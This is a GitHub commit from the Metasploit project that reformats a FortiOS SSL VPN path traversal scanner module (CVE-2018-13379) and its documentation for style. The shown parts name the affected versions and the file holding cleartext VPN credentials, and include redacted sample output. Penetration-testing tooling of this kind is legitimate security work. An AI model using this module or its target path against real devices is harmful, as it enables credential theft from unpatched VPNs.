Rubocop module and msftidy_docs.rb the documentation. Also remove one…

… redundant line from the documentation for clarity.
rapid7 · Feb 25, 2021 · 0ef1ed1 · 0ef1ed1
1 parent b988c18
commit 0ef1ed1
Show file tree

Hide file tree

Showing 2 changed files with 39 additions and 38 deletions.
diff --git a/documentation/modules/auxiliary/scanner/http/fortios_vpnssl_traversal_leak.md b/documentation/modules/auxiliary/scanner/http/fortios_vpnssl_traversal_leak.md
@@ -1,10 +1,7 @@
-FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
-
+## Vulnerable Application
 A path traversal vulnerability in the FortiOS SSL VPN web portal may allow an unauthenticated
 attacker to download FortiOS system files through specially crafted HTTP resource requests.
 
-## Vulnerable Application
-
 This module reads logins and passwords in clear text from the `/dev/cmdb/sslvpn_websession` file.
 This vulnerability affects (FortiOS 5.4.6 to 5.4.12, FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4).
 
@@ -63,7 +60,7 @@ Credentials
 
 host          origin        service            public  private  realm  private_type  JtR Format
 ----          ------        -------            ------  -------  -----  ------------  ----------
-XXX.XX.XXX.X  XXX.XX.XXX.X  10443/tcp (https)  redacted  redacted          Password      
+XXX.XX.XXX.X  XXX.XX.XXX.X  10443/tcp (https)  redacted  redacted          Password
 
 msf6 auxiliary(scanner/http/fortios_vpnssl_traversal_leak) >
 ```
diff --git a/modules/auxiliary/scanner/http/fortios_vpnssl_traversal_leak.rb b/modules/auxiliary/scanner/http/fortios_vpnssl_traversal_leak.rb
@@ -12,40 +12,44 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Post::File
 
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'FortiOS Path Traversal Leak Credentials',
-                      'Description' => '
-        FortiOS system file leak through SSL VPN via specially crafted HTTP
-        resource requests. A path traversal vulnerability in the FortiOS SSL
-        VPN web portal may allow an unauthenticated attacker to download FortiOS
-        system files through specially crafted HTTP resource requests.
-
-        This module reads logins and passwords in clear text from
-        the `/dev/cmdb/sslvpn_websession` file. This vulnerability affects
-        (FortiOS 5.4.6 to 5.4.12, FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0
-        to 6.0.4).
-      ',
-                      'References' => [
-                        %w[CVE 2018-13379],
-                        ['URL', 'https://www.fortiguard.com/psirt/FG-IR-18-384'],
-                        %w[EDB 47287],
-                        %w[EDB 47288]
-                      ],
-                      'Author' => [
-                        'lynx (Carlos Vieira)',         # initial module author from edb
-                        'mekhalleh (RAMELLA Sébastien)' # this module author (Zeop Entreprise)
-                      ],
-                      'License' => MSF_LICENSE,
-                      'DefaultOptions' => {
-                        'RPORT' => 10_443,
-                        'SSL' => true
-                      }))
+    super(
+      update_info(
+        info,
+        'Name' => 'FortiOS Path Traversal Leak Credentials',
+        'Description' => %q{
+          FortiOS system file leak through SSL VPN via specially crafted HTTP
+          resource requests. A path traversal vulnerability in the FortiOS SSL
+          VPN web portal may allow an unauthenticated attacker to download FortiOS
+          system files through specially crafted HTTP resource requests.
+
+          This module reads logins and passwords in clear text from
+          the `/dev/cmdb/sslvpn_websession` file. This vulnerability affects
+          (FortiOS 5.4.6 to 5.4.12, FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0
+          to 6.0.4).
+        },
+        'References' => [
+          %w[CVE 2018-13379],
+          ['URL', 'https://www.fortiguard.com/psirt/FG-IR-18-384'],
+          %w[EDB 47287],
+          %w[EDB 47288]
+        ],
+        'Author' => [
+          'lynx (Carlos Vieira)',         # initial module author from edb
+          'mekhalleh (RAMELLA Sébastien)' # this module author (Zeop Entreprise)
+        ],
+        'License' => MSF_LICENSE,
+        'DefaultOptions' => {
+          'RPORT' => 10_443,
+          'SSL' => true
+        }
+      )
+    )
 
     register_options([
-                       OptEnum.new('DUMP_FORMAT', [true, 'Dump format.', 'raw', %w[raw ascii]]),
-                       OptBool.new('STORE_CRED', [false, 'Store credential into the database.', true]),
-                       OptString.new('TARGETURI', [true, 'Base path', '/remote'])
-                     ])
+      OptEnum.new('DUMP_FORMAT', [true, 'Dump format.', 'raw', %w[raw ascii]]),
+      OptBool.new('STORE_CRED', [false, 'Store credential into the database.', true]),
+      OptString.new('TARGETURI', [true, 'Base path', '/remote'])
+    ])
   end
 
   def execute_request
@@ -158,7 +162,7 @@ def run_host(ip)
                   data.gsub(/[^[:print:]]/, '.')
                 else
                   data
-    end
+                end
     loot_path = store_loot('', 'text/plain', @ip_address, loot_data, '', '')
     print_good(message("File saved to #{loot_path}"))